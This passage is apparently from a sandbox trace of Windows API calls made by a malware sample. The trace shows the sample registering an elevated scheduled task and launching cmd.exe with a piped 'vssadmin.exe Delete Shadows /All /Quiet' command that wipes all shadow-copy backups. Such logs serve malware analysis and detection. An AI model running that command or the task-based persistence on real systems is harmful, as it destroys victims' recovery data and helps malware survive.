wMilliseconds=0xe8)) [0157.479] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x74f20000 [0157.479] GetProcAddress (hModule=0x74f20000, lpProcName="GetUserNameW") returned 0x74f3157a [0157.480] GetUserNameW (in: lpBuffer=0x12d0c0, pcbBuffer=0x12d0a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d0a8) returned 1 [0157.480] ITaskDefinition:get_RegistrationInfo (in: This=0x243e78, ppRegistrationInfo=0x12d0bc | out: ppRegistrationInfo=0x12d0bc*=0x243f38) returned 0x0 [0157.480] IRegistrationInfo:put_Author (This=0x243f38, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0157.480] _vsnwprintf (in: _Buffer=0x12d0c0, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0x12d080 | out: _Buffer="2020-07-24T23:26:18") returned 19 [0157.480] IRegistrationInfo:put_Date (This=0x243f38, Date="2020-07-24T23:26:18") returned 0x0 [0157.481] IUnknown:Release (This=0x243f38) returned 0x1 [0157.494] malloc (_Size=0xc) returned 0x2426f8 [0157.494] free (_Block=0x2426f8) [0157.494] lstrlenW (lpString="") returned 0 [0157.494] ITaskDefinition:get_Principal (in: This=0x243e78, ppPrincipal=0x12d260 | out: ppPrincipal=0x12d260*=0x2425c0) returned 0x0 [0157.495] IPrincipal:put_RunLevel (This=0x2425c0, RunLevel=1) returned 0x0 [0157.495] IUnknown:Release (This=0x2425c0) returned 0x1 [0157.495] malloc (_Size=0xc) returned 0x2426f8 [0157.495] ITaskFolder:RegisterTaskDefinition (in: This=0x243e10, Path="2620738370", pDefinition=0x243e78, flags=2, UserId=0x12d1a4*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0x12d1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x12d1c8*(varType=0x0, wReserved1=0x0, wReserved2=0xce50, wReserved3=0x12, varVal1=0x0, varVal2=0x0), ppTask=0x12d254 | out: ppTask=0x12d254*=0x0) returned 0x800700b7 [0157.663] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.663] LoadStringW (in: hInstance=0x0, uID=0x8a, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="WARNING: The task name \"%s\" already exists. Do you want to replace it (Y/N)? ") returned 0x4d [0157.663] lstrlenW (lpString="WARNING: The task name \"%s\" already exists. Do you want to replace it (Y/N)? ") returned 77 [0157.663] GetProcessHeap () returned 0x4b0000 [0157.663] GetProcessHeap () returned 0x4b0000 [0157.663] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4da0) returned 1 [0157.663] GetProcessHeap () returned 0x4b0000 [0157.663] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4da0) returned 0xe [0157.663] _vsnwprintf (in: _Buffer=0x12d274, _BufferCount=0x1fb, _Format="WARNING: The task name \"%s\" already exists. Do you want to replace it (Y/N)? ", _ArgList=0x12d1d8 | out: _Buffer="WARNING: The task name \"2620738370\" already exists. Do you want to replace it (Y/N)? ") returned 85 [0157.663] _fileno (_File=0x75d32920) returned 1 [0157.664] _errno () returned 0x2407d8 [0157.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.664] _errno () returned 0x2407d8 [0157.664] GetFileType (hFile=0x7) returned 0x2 [0157.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.664] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12d19c | out: lpMode=0x12d19c) returned 1 [0157.664] __iob_func () returned 0x75d32900 [0157.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.664] lstrlenW (lpString="WARNING: The task name \"2620738370\" already exists. Do you want to replace it (Y/N)? ") returned 85 [0157.665] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x12d274*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0x12d1c4, lpReserved=0x0 | out: lpBuffer=0x12d274*, lpNumberOfCharsWritten=0x12d1c4*=0x55) returned 1 [0157.667] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0157.667] MessageBeep (uType=0x30) returned 1 [0157.675] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12cbac | out: lpMode=0x12cbac) returned 1 [0157.829] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1) returned 1 [0157.830] ReadConsoleW (hConsoleInput=0x3, lpBuffer=0x12cbc4, nNumberOfCharsToRead=0x1, lpNumberOfCharsRead=0x12cbbc, pInputControl=0x0) Thread: id = 142 os_tid = 0x600 Thread: id = 152 os_tid = 0x610 Thread: id = 153 os_tid = 0x60c Thread: id = 248 os_tid = 0x368 Process: id = "16" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x71851000" os_pid = "0x458" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 143 os_tid = 0x668 Thread: id = 144 os_tid = 0x134 Thread: id = 145 os_tid = 0x1e4 Thread: id = 146 os_tid = 0x230 Thread: id = 147 os_tid = 0x218 Thread: id = 148 os_tid = 0x130 Thread: id = 149 os_tid = 0x21c Thread: id = 150 os_tid = 0x6b0 Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x42589000" os_pid = "0x73c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "C:\\Windows\\system32\\cmd.exe /C title 5886623|vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 155 os_tid = 0x760 [0202.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef810 | out: lpSystemTimeAsFileTime=0x1ef810*(dwLowDateTime=0x1d505220, dwHighDateTime=0x1d661be)) [0202.736] GetCurrentProcessId () returned 0x73c [0202.736] GetCurrentThreadId () returned 0x760 [0202.736] GetTickCount () returned 0x113e60c [0202.736] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef818 | out: lpPerformanceCount=0x1ef818*=13323190601) returned 1 [0202.738] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0202.738] __set_app_type (_Type=0x1) [0202.738] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0202.738] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0202.739] GetCurrentThreadId () returned 0x760 [0202.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x760) returned 0x3c [0202.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0202.740] GetProcAddress (hModule=0x76f60000, lpProcName="SetThreadUILanguage") returned 0x76f76d40 [0202.740] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0202.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.740] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef7a8 | out: phkResult=0x1ef7a8*=0x0) returned 0x2 [0202.740] VirtualQuery (in: lpAddress=0x1ef790, lpBuffer=0x1ef710, dwLength=0x30 | out: lpBuffer=0x1ef710*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.740] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef710, dwLength=0x30 | out: lpBuffer=0x1ef710*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.740] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef710, dwLength=0x30 | out: lpBuffer=0x1ef710*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.740] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef710, dwLength=0x30 | out: lpBuffer=0x1ef710*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.740] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef710, dwLength=0x30 | out: lpBuffer=0x1ef710*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.740] GetConsoleOutputCP () returned 0x1b5 [0202.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0202.741] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0202.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.742] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0202.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.742] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.742] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.742] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0202.743] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.743] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.743] GetEnvironmentStringsW () returned 0x2b8b40* [0202.743] GetProcessHeap () returned 0x2a0000 [0202.743] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xa7c) returned 0x2b95d0 [0202.743] FreeEnvironmentStringsW (penv=0x2b8b40) returned 1 [0202.743] GetProcessHeap () returned 0x2a0000 [0202.744] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x8) returned 0x2b89c0 [0202.744] GetEnvironmentStringsW () returned 0x2b8b40* [0202.744] GetProcessHeap () returned 0x2a0000 [0202.744] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xa7c) returned 0x2ba060 [0202.744] FreeEnvironmentStringsW (penv=0x2b8b40) returned 1 [0202.744] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee668 | out: phkResult=0x1ee668*=0x44) returned 0x0 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x0, lpData=0x1ee680*=0x18, lpcbData=0x1ee664*=0x1000) returned 0x2 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x1, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x0, lpData=0x1ee680*=0x1, lpcbData=0x1ee664*=0x1000) returned 0x2 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x0, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x40, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x40, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.744] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x0, lpData=0x1ee680*=0x40, lpcbData=0x1ee664*=0x1000) returned 0x2 [0202.744] RegCloseKey (hKey=0x44) returned 0x0 [0202.744] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee668 | out: phkResult=0x1ee668*=0x44) returned 0x0 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x0, lpData=0x1ee680*=0x40, lpcbData=0x1ee664*=0x1000) returned 0x2 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x1, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x0, lpData=0x1ee680*=0x1, lpcbData=0x1ee664*=0x1000) returned 0x2 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x0, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x9, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x4, lpData=0x1ee680*=0x9, lpcbData=0x1ee664*=0x4) returned 0x0 [0202.745] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee660, lpData=0x1ee680, lpcbData=0x1ee664*=0x1000 | out: lpType=0x1ee660*=0x0, lpData=0x1ee680*=0x9, lpcbData=0x1ee664*=0x1000) returned 0x2 [0202.745] RegCloseKey (hKey=0x44) returned 0x0 [0202.745] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae1a5 [0202.745] srand (_Seed=0x5f1ae1a5) [0202.745] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 5886623|vssadmin.exe Delete Shadows /All /Quiet" [0202.745] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 5886623|vssadmin.exe Delete Shadows /All /Quiet" [0202.745] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.746] GetProcessHeap () returned 0x2a0000 [0202.746] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x218) returned 0x2baaf0 [0202.746] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.746] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.746] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.746] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.746] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.746] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.746] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.746] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.746] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.746] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.746] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.746] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.746] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.746] GetProcessHeap () returned 0x2a0000 [0202.746] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b95d0 | out: hHeap=0x2a0000) returned 1 [0202.746] GetEnvironmentStringsW () returned 0x2b8b40* [0202.747] GetProcessHeap () returned 0x2a0000 [0202.747] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xa94) returned 0x2bad10 [0202.747] FreeEnvironmentStringsW (penv=0x2b8b40) returned 1 [0202.747] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.747] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.747] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.747] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.747] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.747] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.747] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.747] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.747] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.747] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.747] GetProcessHeap () returned 0x2a0000 [0202.747] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x38) returned 0x2b6570 [0202.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef470 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1ef470, lpFilePart=0x1ef450 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef450*="system32") returned 0x13 [0202.747] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0202.748] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1ef180 | out: lpFindFileData=0x1ef180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Windows", cAlternateFileName="")) returned 0x2bb7b0 [0202.748] FindClose (in: hFindFile=0x2bb7b0 | out: hFindFile=0x2bb7b0) returned 1 [0202.748] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1ef180 | out: lpFindFileData=0x1ef180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="System32", cAlternateFileName="")) returned 0x2bb7b0 [0202.748] FindClose (in: hFindFile=0x2bb7b0 | out: hFindFile=0x2bb7b0) returned 1 [0202.748] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0202.749] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0202.749] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0202.749] GetProcessHeap () returned 0x2a0000 [0202.749] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bad10 | out: hHeap=0x2a0000) returned 1 [0202.749] GetEnvironmentStringsW () returned 0x2bad10* [0202.749] GetProcessHeap () returned 0x2a0000 [0202.749] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xac4) returned 0x2b8b40 [0202.749] FreeEnvironmentStringsW (penv=0x2bad10) returned 1 [0202.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.749] GetProcessHeap () returned 0x2a0000 [0202.749] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6570 | out: hHeap=0x2a0000) returned 1 [0202.749] GetProcessHeap () returned 0x2a0000 [0202.749] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4016) returned 0x2bad10 [0202.749] GetProcessHeap () returned 0x2a0000 [0202.749] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x80) returned 0x2b9610 [0202.750] GetProcessHeap () returned 0x2a0000 [0202.750] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bad10 | out: hHeap=0x2a0000) returned 1 [0202.750] GetConsoleOutputCP () returned 0x1b5 [0202.825] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0202.825] GetUserDefaultLCID () returned 0x409 [0202.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0202.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef580, cchData=128 | out: lpLCData="0") returned 2 [0202.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef580, cchData=128 | out: lpLCData="0") returned 2 [0202.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef580, cchData=128 | out: lpLCData="1") returned 2 [0202.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0202.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0202.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0202.827] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.828] GetProcessHeap () returned 0x2a0000 [0202.828] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20c) returned 0x2b9710 [0202.828] GetConsoleTitleW (in: lpConsoleTitle=0x2b9710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0202.828] GetProcAddress (hModule=0x76f60000, lpProcName="CopyFileExW") returned 0x76f723d0 [0202.828] GetProcAddress (hModule=0x76f60000, lpProcName="IsDebuggerPresent") returned 0x76f68290 [0202.828] GetProcAddress (hModule=0x76f60000, lpProcName="SetConsoleInputExeNameW") returned 0x76f717e0 [0202.829] GetProcessHeap () returned 0x2a0000 [0202.829] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4012) returned 0x2bad10 [0202.829] GetProcessHeap () returned 0x2a0000 [0202.829] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bad10 | out: hHeap=0x2a0000) returned 1 [0202.830] _wcsicmp (_String1="title", _String2=")") returned 75 [0202.830] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0202.830] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0202.830] _wcsicmp (_String1="IF", _String2="title") returned -11 [0202.830] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0202.830] _wcsicmp (_String1="REM", _String2="title") returned -2 [0202.830] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0202.830] GetProcessHeap () returned 0x2a0000 [0202.830] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xb0) returned 0x2b9930 [0202.830] GetProcessHeap () returned 0x2a0000 [0202.830] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1c) returned 0x2b4670 [0202.830] GetProcessHeap () returned 0x2a0000 [0202.831] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x22) returned 0x2b46a0 [0202.831] GetProcessHeap () returned 0x2a0000 [0202.831] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xb0) returned 0x2b99f0 [0202.832] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0202.832] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0202.832] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0202.832] 